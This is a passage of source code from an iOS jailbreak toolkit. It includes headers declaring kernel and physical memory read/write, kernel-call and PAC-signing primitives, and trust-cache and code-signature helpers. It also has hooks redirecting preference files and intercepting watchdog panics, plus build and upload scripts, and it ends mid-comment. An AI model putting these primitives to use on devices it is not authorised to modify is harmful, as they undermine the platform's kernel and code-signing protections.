36 | uint64_t x[29]; 37 | uint64_t lr; 38 | uint64_t sp; 39 | uint64_t pc; 40 | } KcallThreadState; 41 | 42 | extern bool gIsJailbreakd; 43 | 44 | uint64_t jbdParseNumUInt64(NSNumber *num); 45 | uint64_t jbdParseNumInt64(NSNumber *num); 46 | bool jbdParseBool(NSNumber *num); 47 | 48 | mach_port_t jbdMachPort(void); 49 | xpc_object_t sendJBDMessage(xpc_object_t message); 50 | 51 | void jbdGetStatus(uint64_t *PPLRWStatus, uint64_t *kcallStatus, pid_t *pid); 52 | void jbdTransferPPLRW(void); 53 | uint64_t jbdTransferKcall(); 54 | void jbdFinalizeKcall(void); 55 | 56 | uint64_t jbdGetPPLRWPage(int64_t *errOut); 57 | int jbdInitPPLRW(void); 58 | uint64_t jbdKcallThreadState(KcallThreadState *threadState, bool raw); 59 | uint64_t jbdKcall(uint64_t func, uint64_t argc, const uint64_t *argv); 60 | uint64_t jbdKcall8(uint64_t func, uint64_t a1, uint64_t a2, uint64_t a3, uint64_t a4, uint64_t a5, 61 | uint64_t a6, uint64_t a7, uint64_t a8); 62 | int64_t jbdInitEnvironment(void); 63 | 64 | int64_t jbdUpdateFromTIPA(NSString *pathToTIPA, bool rebootWhenDone); 65 | int64_t jbdUpdateFromBasebinTar(NSString *pathToBasebinTar, bool rebootWhenDone); 66 | 67 | int64_t jbdRebuildTrustCache(void); 68 | int64_t jbdProcessBinary(const char *filePath); 69 | int64_t jbdProcSetDebugged(pid_t pid); 70 | 71 | int64_t jbdBindMountPath(NSString *source, bool check_existances); 72 | int64_t jbdBindUnmountPath(NSString *source); 73 | -------------------------------------------------------------------------------- /BaseBin/libjailbreak/src/kcall.h: -------------------------------------------------------------------------------- 1 | #import 2 | #import "jailbreakd.h" 3 | 4 | typedef enum { 5 | kKcallStatusNotInitialized = 0, 6 | kKcallStatusPrepared = 1, 7 | kKcallStatusFinalized = 2 8 | } KcallStatus; 9 | 10 | typedef struct { 11 | uint64_t unk; 12 | uint64_t x[29]; 13 | uint64_t fp; 14 | uint64_t lr; 15 | uint64_t sp; 16 | uint64_t pc; 17 | uint32_t cpsr; 18 | // Other stuff 19 | uint64_t 
other[70]; 20 | } kRegisterState; 21 | 22 | extern KcallStatus gKCallStatus; 23 | 24 | void pac_loop(void); 25 | 26 | uint64_t kcall(uint64_t func, uint64_t argc, const uint64_t *argv); 27 | uint64_t kcall8(uint64_t func, uint64_t a1, uint64_t a2, uint64_t a3, uint64_t a4, uint64_t a5, uint64_t a6, uint64_t a7, uint64_t a8); 28 | uint64_t kcall_with_raw_thread_state(KcallThreadState threadState); 29 | uint64_t kcall_with_thread_state(KcallThreadState threadState); 30 | uint64_t initPACPrimitives(uint64_t kernelAllocation); 31 | void finalizePACPrimitives(void); 32 | int signState(uint64_t actContext); 33 | int recoverPACPrimitives(); 34 | void destroyPACPrimitives(void); -------------------------------------------------------------------------------- /BaseBin/libjailbreak/src/launchd.h: -------------------------------------------------------------------------------- 1 | #import 2 | xpc_object_t launchd_xpc_send_message(xpc_object_t xdict); 3 | 4 | typedef enum { 5 | LAUNCHD_JB_MSG_ID_GET_PPLRW, 6 | LAUNCHD_JB_MSG_ID_SIGN_STATE 7 | } LAUNCHD_JB_MSG; 8 | 9 | void patchBaseBinLaunchDaemonPlist(NSString *plistPath); 10 | void patchBaseBinLaunchDaemonPlists(void); -------------------------------------------------------------------------------- /BaseBin/libjailbreak/src/launchd.m: -------------------------------------------------------------------------------- 1 | #import "launchd.h" 2 | #import "util.h" 3 | 4 | #define OS_ALLOC_ONCE_KEY_MAX 100 5 | 6 | struct _os_alloc_once_s { 7 | long once; 8 | void *ptr; 9 | }; 10 | 11 | struct xpc_global_data { 12 | uint64_t a; 13 | uint64_t xpc_flags; 14 | mach_port_t task_bootstrap_port; /* 0x10 */ 15 | #ifndef _64 16 | uint32_t padding; 17 | #endif 18 | xpc_object_t xpc_bootstrap_pipe; /* 0x18 */ 19 | // and there's more, but you'll have to wait for MOXiI 2 for those... 20 | // ... 
21 | }; 22 | 23 | extern struct _os_alloc_once_s _os_alloc_once_table[]; 24 | extern void* _os_alloc_once(struct _os_alloc_once_s *slot, size_t sz, os_function_t init); 25 | /* Sends xdict through the xpc_bootstrap_pipe found in slot 1 of _os_alloc_once_table and returns the reply. Returns nil when the slot, the pipe or the pipe routine fails. */ 26 | xpc_object_t launchd_xpc_send_message(xpc_object_t xdict) 27 | { 28 | void* pipePtr = NULL; 29 | 30 | if(_os_alloc_once_table[1].once == -1) 31 | { 32 | pipePtr = _os_alloc_once_table[1].ptr; 33 | } 34 | else 35 | { 36 | pipePtr = _os_alloc_once(&_os_alloc_once_table[1], 472, NULL); /* NOTE(review): 472 is the size requested for the slot; where it comes from is not shown here, and struct xpc_global_data above is a partial layout - confirm both against the targeted OS versions */ 37 | if (!pipePtr) _os_alloc_once_table[1].once = -1; /* NOTE(review): marks the slot as done when the allocation returned NULL - confirm this is intended */ 38 | } 39 | 40 | xpc_object_t xreply = nil; 41 | if (pipePtr) { 42 | struct xpc_global_data* globalData = pipePtr; 43 | xpc_object_t pipe = globalData->xpc_bootstrap_pipe; 44 | if (pipe) { 45 | int err = xpc_pipe_routine_with_flags(pipe, xdict, &xreply, 0); 46 | if (err != 0) { 47 | return nil; /* the error code is dropped; callers only see nil */ 48 | } 49 | } 50 | } 51 | return xreply; 52 | } 53 | /* Rewrites ProgramArguments[0] of the plist at plistPath through prebootPath() unless it already starts with /private/preboot, then writes the plist back in place. */ 54 | void patchBaseBinLaunchDaemonPlist(NSString *plistPath) 55 | { 56 | NSMutableDictionary *plistDict = [NSMutableDictionary dictionaryWithContentsOfFile:plistPath]; 57 | if (plistDict) { 58 | NSMutableArray *programArguments = ((NSArray *)plistDict[@"ProgramArguments"]).mutableCopy; /* NOTE(review): cast without an isKindOfClass: check; the element read below is likewise assumed to be an NSString */ 59 | if (programArguments.count >= 1) { 60 | NSString *pathBefore = programArguments[0]; 61 | if (![pathBefore hasPrefix:@"/private/preboot"]) { 62 | programArguments[0] = prebootPath(pathBefore); 63 | plistDict[@"ProgramArguments"] = programArguments.copy; 64 | [plistDict writeToFile:plistPath atomically:YES]; /* return value ignored: a failed write leaves the old plist in place without any report */ 65 | } 66 | } 67 | } 68 | } 69 | /* Applies patchBaseBinLaunchDaemonPlist to every entry of basebin/LaunchDaemons and of its Disabled subfolder; directory listing errors are ignored. */ 70 | void patchBaseBinLaunchDaemonPlists(void) 71 | { 72 | NSURL *launchDaemonURL = [NSURL fileURLWithPath:prebootPath(@"basebin/LaunchDaemons") isDirectory:YES]; 73 | NSArray *launchDaemonPlistURLs = [[NSFileManager defaultManager] contentsOfDirectoryAtURL:launchDaemonURL includingPropertiesForKeys:nil options:0 error:nil]; 74 | for (NSURL *launchDaemonPlistURL in launchDaemonPlistURLs) { 75 | patchBaseBinLaunchDaemonPlist(launchDaemonPlistURL.path); 76 | } 77 | 78 | NSURL
*disabledLaunchDaemonURL = [NSURL fileURLWithPath:prebootPath(@"basebin/LaunchDaemons/Disabled") isDirectory:YES]; 79 | NSArray *disabledLaunchDaemonPlistURLs = [[NSFileManager defaultManager] contentsOfDirectoryAtURL:disabledLaunchDaemonURL includingPropertiesForKeys:nil options:0 error:nil]; 80 | for (NSURL *disabledLaunchDaemonPlistURL in disabledLaunchDaemonPlistURLs) { 81 | patchBaseBinLaunchDaemonPlist(disabledLaunchDaemonPlistURL.path); 82 | } 83 | } 84 | -------------------------------------------------------------------------------- /BaseBin/libjailbreak/src/libjailbreak.h: -------------------------------------------------------------------------------- 1 | #import "boot_info.h" 2 | #import "handoff.h" 3 | #import "jailbreakd.h" 4 | #import "pplrw.h" 5 | #import "pte.h" 6 | #import "kcall.h" 7 | #import "util.h" 8 | #import "log.h" -------------------------------------------------------------------------------- /BaseBin/libjailbreak/src/log.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include 6 | 7 | bool debugLogsEnabled = false; 8 | bool errorLogsEnabled = false; 9 | #define LOGGING_PATH "/var/log/" 10 | 11 | const char *JBLogGetProcessName(void) 12 | { 13 | static char *processName = NULL; 14 | static dispatch_once_t onceToken; 15 | dispatch_once (&onceToken, ^{ 16 | uint32_t length = 0; 17 | _NSGetExecutablePath(NULL, &length); 18 | char *buf = malloc(length); 19 | _NSGetExecutablePath(buf, &length); 20 | 21 | char delim[] = "/"; 22 | char *last = NULL; 23 | char *ptr = strtok(buf, delim); 24 | while(ptr != NULL) 25 | { 26 | last = ptr; 27 | ptr = strtok(NULL, delim); 28 | } 29 | processName = strdup(last); 30 | free(buf); 31 | }); 32 | return processName; 33 | } 34 | 35 | 36 | void JBDLogV(const char* prefix, const char *format, va_list va) 37 | { 38 | static char *logFilePath = NULL; 39 | static dispatch_once_t onceToken; 40 | dispatch_once (&onceToken, ^{ 
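41 | const char *processName = JBLogGetProcessName(); 42 | 43 | time_t t = time(NULL); 44 | struct tm *tm = localtime(&t); 45 | char timestamp[64]; 46 | snprintf(&timestamp[0], sizeof(timestamp), "%lu", t); /* bounded write of the start time, which becomes part of the log file name */ 47 | 48 | logFilePath = malloc(strlen(LOGGING_PATH) + strlen(processName) + strlen(timestamp) + 6); /* 6 = one dash, the four bytes of .log and the terminating NUL. NOTE(review): the malloc result is not checked before the copies below. */ 49 | strcpy(logFilePath, LOGGING_PATH); 50 | strcat(logFilePath, processName); 51 | strcat(logFilePath, "-"); 52 | strcat(logFilePath, timestamp); 53 | strcat(logFilePath, ".log"); 54 | }); 55 | 56 | FILE *logFile = fopen(logFilePath, "a"); /* NOTE(review): the file name is built from the process name and start time under LOGGING_PATH and the file is opened in append mode on every call; confirm who can read and create entries in that directory, and keep secrets and kernel addresses out of log messages */ 57 | if (logFile) { 58 | time_t ltime; 59 | struct tm result; 60 | char stime[32]; 61 | ltime = time(NULL); 62 | 63 | fprintf(logFile, "[%lu] [%s] ", ltime, prefix); 64 | vfprintf(logFile, format, va); /* format is used as a printf format string, so callers must pass a constant format and put variable data in the arguments */ 65 | fprintf(logFile, "\n"); 66 | 67 | fflush(logFile); 68 | fclose(logFile); 69 | } 70 | } 71 | /* Writes one DEBUG line through JBDLogV when debugLogsEnabled is set; otherwise does nothing. */ 72 | void JBLogDebug(const char *format, ...) 73 | { 74 | if (!debugLogsEnabled) return; 75 | va_list va; 76 | va_start(va, format); 77 | JBDLogV("DEBUG", format, va); 78 | va_end(va); 79 | } 80 | /* Writes one ERROR line through JBDLogV when errorLogsEnabled is set; otherwise does nothing. */ 81 | void JBLogError(const char *format, ...) 82 | { 83 | if (!errorLogsEnabled) return; 84 | va_list va; 85 | va_start(va, format); 86 | JBDLogV("ERROR", format, va); 87 | va_end(va); 88 | } -------------------------------------------------------------------------------- /BaseBin/libjailbreak/src/log.h: -------------------------------------------------------------------------------- 1 | //#define ENABLE_LOGS 2 | 3 | #ifdef ENABLE_LOGS 4 | void JBLogDebug(const char *format, ...); 5 | void JBLogError(const char *format, ...); 6 | #else 7 | #define JBLogDebug(format ...) 8 | #define JBLogError(format ...) 9 | #endif 10 | 11 | //#define JBLogDebug(format ...) NSLog(@format) 12 | //#define JBLogError(format ...)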
NSLog(@format) -------------------------------------------------------------------------------- /BaseBin/libjailbreak/src/macho.h: -------------------------------------------------------------------------------- 1 | #import 2 | #import 3 | #import 4 | #import 5 | #import 6 | #import 7 | #import 8 | #import 9 | #import 10 | #import "csblob.h" 11 | 12 | void machoEnumerateArchs(FILE* machoFile, void (^archEnumBlock)(struct fat_arch* arch, uint32_t archMetadataOffset, uint32_t archOffset, BOOL* stop)); 13 | void machoGetInfo(FILE* candidateFile, bool *isMachoOut, bool *isLibraryOut); 14 | int64_t machoFindArch(FILE *machoFile, uint32_t subtypeToSearch); 15 | int64_t machoFindBestArch(FILE *machoFile); 16 | 17 | void machoEnumerateLoadCommands(FILE *machoFile, uint32_t archOffset, void (^enumerateBlock)(struct load_command cmd, uint32_t cmdOffset)); 18 | void machoFindLoadCommand(FILE *machoFile, uint32_t cmd, void *lcOut, size_t lcSize); 19 | void machoFindCSData(FILE* machoFile, uint32_t archOffset, uint32_t* outOffset, uint32_t* outSize); 20 | 21 | void machoEnumerateDependencies(FILE *machoFile, uint32_t archOffset, NSString *machoPath, void (^enumerateBlock)(NSString *dependencyPath)); 22 | 23 | void machoCSDataEnumerateBlobs(FILE *machoFile, uint32_t CSDataStart, uint32_t CSDataSize, void (^enumerateBlock)(struct CSBlob blobDescriptor, uint32_t blobDescriptorOffset, BOOL *stop)); 24 | NSData *machoCSDataCalculateCDHash(FILE *machoFile, uint32_t CSDataStart, uint32_t CSDataSize); 25 | bool machoCSDataIsAdHocSigned(FILE *machoFile, uint32_t CSDataStart, uint32_t CSDataSize); -------------------------------------------------------------------------------- /BaseBin/libjailbreak/src/pac.S: -------------------------------------------------------------------------------- 1 | .text 2 | 3 | .align 4 4 | 5 | .global _pac_loop 6 | _pac_loop: 7 | mov x0, #1 8 | adrp x1, _gUserReturnDidHappen@PAGE 9 | str x0, [x1, _gUserReturnDidHappen@PAGEOFF] 10 | b _pac_loop 
-------------------------------------------------------------------------------- /BaseBin/libjailbreak/src/patchfind.h: -------------------------------------------------------------------------------- 1 | void *patchfind_seek_back(void *startPtr, uint32_t toInstruction, uint32_t mask, unsigned int maxSearch); 2 | void *patchfind_find(int imageIndex, unsigned char *bytesToSearch, unsigned char *byteMask, size_t byteCount); -------------------------------------------------------------------------------- /BaseBin/libjailbreak/src/pplrw.h: -------------------------------------------------------------------------------- 1 | #import 2 | 3 | #define PPLRW_USER_MAPPING_OFFSET 0x7000000000 4 | #define PPLRW_USER_MAPPING_TTEP_IDX (PPLRW_USER_MAPPING_OFFSET / 0x1000000000) 5 | 6 | typedef enum { 7 | kPPLRWStatusNotInitialized = 0, 8 | kPPLRWStatusInitialized = 1 9 | } PPLRWStatus; 10 | extern PPLRWStatus gPPLRWStatus; 11 | 12 | uint64_t unsign_kptr(uint64_t a); 13 | 14 | uint64_t phystokv(uint64_t pa); 15 | uint64_t vtophys(uint64_t ttep, uint64_t va); 16 | uint64_t kvtophys(uint64_t va); 17 | void *phystouaddr(uint64_t pa); 18 | void *kvtouaddr(uint64_t va); 19 | 20 | uint64_t kaddr_to_pa(uint64_t virt, bool *err); 21 | 22 | int physreadbuf(uint64_t physaddr, void* output, size_t size); 23 | int physwritebuf(uint64_t physaddr, const void* input, size_t size); 24 | int kreadbuf(uint64_t kaddr, void* output, size_t size); 25 | int kwritebuf(uint64_t kaddr, const void* input, size_t size); 26 | 27 | uint64_t physread64(uint64_t pa); 28 | uint64_t physread_ptr(uint64_t va); 29 | uint32_t physread32(uint64_t pa); 30 | uint16_t physread16(uint64_t pa); 31 | uint8_t physread8(uint64_t pa); 32 | 33 | int physwrite64(uint64_t pa, uint64_t v); 34 | int physwrite32(uint64_t pa, uint32_t v); 35 | int physwrite16(uint64_t pa, uint16_t v); 36 | int physwrite8(uint64_t pa, uint8_t v); 37 | 38 | uint64_t kread64(uint64_t va); 39 | uint64_t kread_ptr(uint64_t va); 40 | uint32_t 
kread32(uint64_t va); 41 | uint16_t kread16(uint64_t va); 42 | uint8_t kread8(uint64_t va); 43 | 44 | int kwrite64(uint64_t va, uint64_t v); 45 | int kwrite32(uint64_t va, uint32_t v); 46 | int kwrite16(uint64_t va, uint16_t v); 47 | int kwrite8(uint64_t va, uint8_t v); 48 | 49 | void initPPLPrimitives(void); 50 | 51 | -------------------------------------------------------------------------------- /BaseBin/libjailbreak/src/signatures.h: -------------------------------------------------------------------------------- 1 | #import 2 | int getCSBlobOffsetAndSize(FILE* machoFile, uint32_t* outOffset, uint32_t* outSize); 3 | 4 | NSString *processRpaths(NSString *path, NSString *tokenName, NSArray *rpaths); 5 | NSString *resolveLoadPath(NSString *loadPath, NSString *machoPath, NSString *sourceExecutablePath, NSArray *rpaths); 6 | int evaluateSignature(NSURL* fileURL, NSData **cdHashOut, BOOL *isAdhocSignedOut); 7 | BOOL isCdHashInTrustCache(NSData *cdHash); 8 | int loadEmbeddedSignature(FILE *file); -------------------------------------------------------------------------------- /BaseBin/rootlesshooks/.gitignore: -------------------------------------------------------------------------------- 1 | .theos/ 2 | packages/ 3 | .DS_Store 4 | -------------------------------------------------------------------------------- /BaseBin/rootlesshooks/Makefile: -------------------------------------------------------------------------------- 1 | TARGET := iphone:clang:16.4:15.0 2 | INSTALL_TARGET_PROCESSES = lsd cfprefsd 3 | FINALPACKAGE = 1 4 | THEOS_PACKAGE_SCHEME = rootless 5 | ARCHS = arm64e 6 | 7 | include $(THEOS)/makefiles/common.mk 8 | 9 | TWEAK_NAME = rootlesshooks 10 | 11 | rootlesshooks_FILES = main.x installd.x cfprefsd.x 12 | rootlesshooks_CFLAGS = -fobjc-arc 13 | rootlesshooks_LDFLAGS = -rpath @loader_path/fallback 14 | 15 | include $(THEOS_MAKE_PATH)/tweak.mk 16 | -------------------------------------------------------------------------------- 
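/BaseBin/rootlesshooks/cfprefsd.x:
--------------------------------------------------------------------------------
// NOTE(review): the first import's target was stripped by the page extractor;
// Foundation is what the NSString/NSArray/NSLog uses below require.
#import <Foundation/Foundation.h>
#import <limits.h>  // PATH_MAX, used below as the assumed capacity of the path buffer
#import <string.h>  // strlen, memmove, memcpy
#import "substrate.h"


/*
 * Decides whether the preference plist at plistPath should be redirected
 * underneath /var/jb.
 *
 * Returns NO for a nil path, for paths under /private/var/mobile/Containers,
 * /var/db or /var/jb, for plist names carrying one of the Apple prefixes, and
 * for the names in the explicit list below. Returns YES for everything else.
 */
BOOL preferencePlistNeedsRedirection(NSString *plistPath)
{
    // Messaging nil yields NO for every check below, which would fall through
    // to "redirect"; reject a missing path explicitly instead.
    if (!plistPath) return NO;

    if ([plistPath hasPrefix:@"/private/var/mobile/Containers"] || [plistPath hasPrefix:@"/var/db"] || [plistPath hasPrefix:@"/var/jb"]) return NO;

    NSString *plistName = plistPath.lastPathComponent;

    if ([plistName hasPrefix:@"com.apple."] || [plistName hasPrefix:@"systemgroup.com.apple."] || [plistName hasPrefix:@"group.com.apple."]) return NO;

    // Plist names that are left at their original location although they do
    // not carry one of the prefixes checked above.
    NSArray *additionalSystemPlistNames = @[
        @".GlobalPreferences.plist",
        @".GlobalPreferences_m.plist",
        @"bluetoothaudiod.plist",
        @"NetworkInterfaces.plist",
        @"OSThermalStatus.plist",
        @"preferences.plist",
        @"osanalyticshelper.plist",
        @"UserEventAgent.plist",
        @"wifid.plist",
        @"dprivacyd.plist",
        @"silhouette.plist",
        @"nfcd.plist",
        @"kNPProgressTrackerDomain.plist",
        @"siriknowledged.plist",
        @"UITextInputContextIdentifiers.plist",
        @"mobile_storage_proxy.plist",
        @"splashboardd.plist",
        @"mobile_installation_proxy.plist",
        @"languageassetd.plist",
        @"ptpcamerad.plist",
        @"com.google.gmp.measurement.monitor.plist",
        @"com.google.gmp.measurement.plist",
    ];

    return ![additionalSystemPlistNames containsObject:plistName];
}


// Filled in by MSHookFunction in cfprefsdInit with the original implementation.
BOOL (*orig_CFPrefsGetPathForTriplet)(CFStringRef, CFStringRef, BOOL, CFStringRef, UInt8*);

/*
 * Replacement for __CFPrefsGetPathForTriplet.
 *
 * Calls the original, and when it succeeded, /var/jb exists and
 * preferencePlistNeedsRedirection() says so, rewrites the path in `buffer`
 * in place to "/var/jb" + original path. The original's return value is
 * passed through unchanged.
 *
 * The hook is not told how large `buffer` is. The rewrite grows the string
 * by seven bytes, so it is performed only when the result still fits in
 * PATH_MAX bytes.
 * NOTE(review): PATH_MAX is an assumed capacity - confirm it against the
 * buffer the callers of __CFPrefsGetPathForTriplet actually allocate.
 */
BOOL new_CFPrefsGetPathForTriplet(CFStringRef bundleIdentifier, CFStringRef user, BOOL byHost, CFStringRef path, UInt8 *buffer)
{
    BOOL orig = orig_CFPrefsGetPathForTriplet(bundleIdentifier, user, byHost, path, buffer);

    if (orig && buffer && !access("/var/jb", F_OK))
    {
        // stringWithUTF8String: returns nil when the bytes are not valid UTF-8.
        // The path is left untouched in that case instead of handing a NULL
        // UTF8String to a C string function.
        NSString *origPath = [NSString stringWithUTF8String:(char *)buffer];
        if (origPath && preferencePlistNeedsRedirection(origPath)) {
            static const char redirectPrefix[] = "/var/jb";
            const size_t prefixLen = sizeof(redirectPrefix) - 1;
            const size_t pathLen = strlen((char *)buffer);

            if (prefixLen + pathLen + 1 <= PATH_MAX) {
                NSLog(@"Plist redirected to /var/jb: %@", origPath);
                // Shift the existing path (including its terminator) to make
                // room, then write the prefix in front of it.
                memmove(buffer + prefixLen, buffer, pathLen + 1);
                memcpy(buffer, redirectPrefix, prefixLen);
            } else {
                NSLog(@"Plist not redirected, path too long: %@", origPath);
            }
        }
    }

    return orig;
}

/*
 * Looks up __CFPrefsGetPathForTriplet in CoreFoundation and, if the symbol is
 * found, hooks it with new_CFPrefsGetPathForTriplet. Then runs the Logos
 * %init for this file.
 */
void cfprefsdInit(void)
{
    MSImageRef coreFoundationImage = MSGetImageByName("/System/Library/Frameworks/CoreFoundation.framework/CoreFoundation");
    void* CFPrefsGetPathForTriplet_ptr = MSFindSymbol(coreFoundationImage, "__CFPrefsGetPathForTriplet");
    if(CFPrefsGetPathForTriplet_ptr)
    {
        MSHookFunction(CFPrefsGetPathForTriplet_ptr, (void *)&new_CFPrefsGetPathForTriplet, (void **)&orig_CFPrefsGetPathForTriplet);
    }

    %init();
}
--------------------------------------------------------------------------------
/BaseBin/rootlesshooks/installd.x:
--------------------------------------------------------------------------------
// NOTE(review): the import's target was stripped by the page extractor;
// restore it from the repository.
#import

// BOOTLOOP RISK, DO NOT TOUCH
/*%hook MIGlobalConfiguration

- (NSMutableDictionary *)_bundleIDMapForBundlesInDirectory:(NSURL *)directoryURL
                                             withExtension:(NSString *)extension
                                     loadingAdditionalKeys:(NSSet *)additionalKeys
{
    NSLog(@"_bundleIDMapForBundlesInDirectory(%@, %@, %@)", directoryURL, extension, additionalKeys);

    if ([directoryURL.path isEqualToString:@"/Applications"] && [extension isEqualToString:@"app"]) {
        NSMutableDictionary *origMap = %orig;

        NSURL *rootlessAppDir = [NSURL fileURLWithPath:@"/var/jb/Applications" isDirectory:YES];
        NSMutableDictionary *rootlessAppsMap = %orig(rootlessAppDir, extension, additionalKeys);
        [origMap addEntriesFromDictionary:rootlessAppsMap];
        return origMap;
    }

    return %orig;
}

%end*/

// Runs the Logos %init for this file; the only hook in it is commented out above.
void installdInit(void)
{
    %init();
}
--------------------------------------------------------------------------------
/BaseBin/rootlesshooks/main.x: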
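--------------------------------------------------------------------------------
// NOTE(review): the import's target was stripped by the page extractor;
// Foundation is what the NSString uses below require.
#import <Foundation/Foundation.h>

/*
 * Returns argv[0] of the current process as an NSString, or nil when argv[0]
 * is unavailable (stringWithUTF8String: must not be given NULL).
 */
NSString* safe_getExecutablePath()
{
    extern char*** _NSGetArgv();
    char*** argvPtr = _NSGetArgv();
    if (!argvPtr || !*argvPtr || !**argvPtr) return nil;
    char* executablePathC = **argvPtr;
    return [NSString stringWithUTF8String:executablePathC];
}

// Returns the last path component of the executable path (nil if that is nil).
NSString* getProcessName()
{
    return safe_getExecutablePath().lastPathComponent;
}

// Constructor: picks the per-process initialiser by process name.
// The installd initialiser is declared but its call is commented out.
%ctor
{
    NSString *processName = getProcessName();
    if ([processName isEqualToString:@"installd"]) {
        extern void installdInit(void);
        //installdInit();
    }
    else if ([processName isEqualToString:@"cfprefsd"]) {
        extern void cfprefsdInit(void);
        cfprefsdInit();
    }
}
--------------------------------------------------------------------------------
/BaseBin/systemhook/Makefile:
--------------------------------------------------------------------------------
TARGET = systemhook.dylib
CC = clang

CFLAGS = -I../_shared -I./src -isysroot $(shell xcrun --sdk iphoneos --show-sdk-path) -arch arm64e -miphoneos-version-min=15.0 -Wno-deprecated-declarations -Os -moutline
LDFLAGS = -dynamiclib

sign: $(TARGET)
	@ldid -S $^

$(TARGET): $(wildcard src/*.c)
	$(CC) $(CFLAGS) $(LDFLAGS) -o $@ $^

clean:
	@rm -f $(TARGET)
--------------------------------------------------------------------------------
/BaseBin/systemhook/src/common.h:
--------------------------------------------------------------------------------
// NOTE(review): the two system header names were stripped by the page
// extractor; restore them from the repository.
#include
#include

#define HOOK_DYLIB_PATH "/usr/lib/systemhook.dylib"
extern char *JB_SandboxExtensions;
extern char *JB_RootPath;
extern bool swh_is_debugged;

// Builds JB_RootPath + path in an alloca'd PATH_MAX buffer; strlcpy/strlcat
// truncate at PATH_MAX. Because the buffer comes from alloca, the result is
// only valid inside the function that expands the macro.
#define JB_ROOT_PATH(path) ({ \
    char *outPath = alloca(PATH_MAX); \
    strlcpy(outPath, JB_RootPath, PATH_MAX); \
    strlcat(outPath, path, PATH_MAX); \
    (outPath); \
})

bool stringStartsWith(const char *str, const char* prefix);
bool stringEndsWith(const char* str, const char* suffix);

int64_t jbdswFixSetuid(void);
int64_t jbdswProcessBinary(const char *filePath);
int64_t jbdswProcessLibrary(const char *filePath);
int64_t jbdswDebugMe(void);
int64_t jbdswInterceptUserspacePanic(const char *messageString);

int resolvePath(const char *file, const char *searchPath, int (^attemptHandler)(char *path));
int spawn_hook_common(pid_t *restrict pid, const char *restrict path,
                      const posix_spawn_file_actions_t *restrict file_actions,
                      const posix_spawnattr_t *restrict attrp,
                      char *const argv[restrict],
                      char *const envp[restrict],
                      void *pspawn_org);
--------------------------------------------------------------------------------
/BaseBin/systemhook/src/envbuf.h:
--------------------------------------------------------------------------------
int envbuf_len(const char *envp[]);
char **envbuf_mutcopy(const char *envp[]);
void envbuf_free(char *envp[]);
int envbuf_find(const char *envp[], const char *name);
const char *envbuf_getenv(const char *envp[], const char *name);
void envbuf_setenv(char **envpp[], const char *name, const char *value);
void envbuf_unsetenv(char **envpp[], const char *name);
--------------------------------------------------------------------------------
/BaseBin/systemhook/src/launchd.h:
--------------------------------------------------------------------------------
#define OS_ALLOC_ONCE_KEY_MAX 100

struct _os_alloc_once_s {
    long once;
    void *ptr;
};

struct xpc_global_data {
    uint64_t a;
    uint64_t xpc_flags;
    mach_port_t task_bootstrap_port; /* 0x10 */
#ifndef _64
    uint32_t padding;
#endif
    xpc_object_t xpc_bootstrap_pipe; /* 0x18 */
    // and there's more, but you'll have to wait for MOXiI 2 for those...
    // ...
};

extern struct _os_alloc_once_s _os_alloc_once_table[];
extern void* _os_alloc_once(struct _os_alloc_once_s *slot, size_t sz, os_function_t init);
--------------------------------------------------------------------------------
/BaseBin/systemhook/upload.sh:
--------------------------------------------------------------------------------
set -e

PROJECT_NAME=systemhook.dylib
DEVICE=root@localhost
PORT=2223

make
ssh $DEVICE -p $PORT "rm -rf /var/jb/$PROJECT_NAME"
scp -P$PORT ./$PROJECT_NAME $DEVICE:/var/jb/$PROJECT_NAME
ssh $DEVICE -p $PORT "/var/jb/basebin/jbctl rebuild_trustcache"
--------------------------------------------------------------------------------
/BaseBin/tar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Liam0205/Dopamine/ec4fa85bb8fe3aa0c63bedb1d7ec90b1a4d11ff0/BaseBin/tar
--------------------------------------------------------------------------------
/BaseBin/watchdoghook/Makefile:
--------------------------------------------------------------------------------
TARGET = watchdoghook.dylib
CC = clang

CFLAGS = -framework Foundation -framework CoreServices -framework Security -I../_shared -I./src -isysroot $(shell xcrun --sdk iphoneos --show-sdk-path) -arch arm64e -miphoneos-version-min=15.0 -fobjc-arc -O2
LDFLAGS = -dynamiclib -rpath /var/jb/Library/Frameworks -rpath @loader_path/fallback -L../_shared -lellekit -framework IOKit

sign: $(TARGET)
	@ldid -S $^

$(TARGET): $(wildcard src/*.m)
	$(CC) $(CFLAGS) $(LDFLAGS) -o $@ $^

clean:
	@rm -f $(TARGET)
--------------------------------------------------------------------------------
/BaseBin/watchdoghook/src/main.m:
--------------------------------------------------------------------------------
// NOTE(review): the four system header names were stripped by the page
// extractor. The code below needs the declarations of int64_t, dlsym and the
// IOKit/Mach calls; restore the exact list from the repository.
#include
#include
#include
#include

#include "substrate.h"

// Resolved with dlsym in initializer(); stays NULL when the symbol is absent.
int64_t (*jbdswInterceptUserspacePanic)(const char *messageString) = NULL;
// Original implementations, filled in by MSHookFunction.
kern_return_t (*IOConnectCallStructMethod_orig)(mach_port_t connection, uint32_t selector, const void *inputStruct, size_t inputStructCnt, void *outputStruct, size_t *outputStructCnt) = NULL;
kern_return_t (*IOServiceOpen_orig)(io_service_t service, task_port_t owningTask, uint32_t type, io_connect_t *connect);
// Connection returned by the last successful IOServiceOpen on an IOWatchdog service.
mach_port_t gIOWatchdogConnection = MACH_PORT_NULL;

/*
 * IOServiceOpen replacement: forwards to the original and, when the call
 * succeeded on a service conforming to "IOWatchdog", remembers the returned
 * connection in gIOWatchdogConnection. The original result is returned.
 */
kern_return_t IOServiceOpen_hook(io_service_t service, task_port_t owningTask, uint32_t type, io_connect_t *connect)
{
    kern_return_t orig = IOServiceOpen_orig(service, owningTask, type, connect);
    if (orig == KERN_SUCCESS && connect) {
        if (IOObjectConformsTo(service, "IOWatchdog")) {
            // save mach port of IOWatchdog for check later
            gIOWatchdogConnection = *connect;
        }
    }
    return orig;
}

/*
 * IOConnectCallStructMethod replacement: a call with selector 2 on the saved
 * IOWatchdog connection is handed to jbdswInterceptUserspacePanic instead of
 * the kernel; every other call goes to the original.
 *
 * The call is only diverted when a watchdog connection has actually been
 * recorded and the interceptor was resolved. Without these checks a NULL
 * function pointer would be called when the dlsym lookup failed, and a call on
 * MACH_PORT_NULL would match the not-yet-set global.
 *
 * NOTE(review): inputStruct is passed on as a C string and inputStructCnt is
 * not forwarded - confirm the message is NUL-terminated within inputStructCnt.
 */
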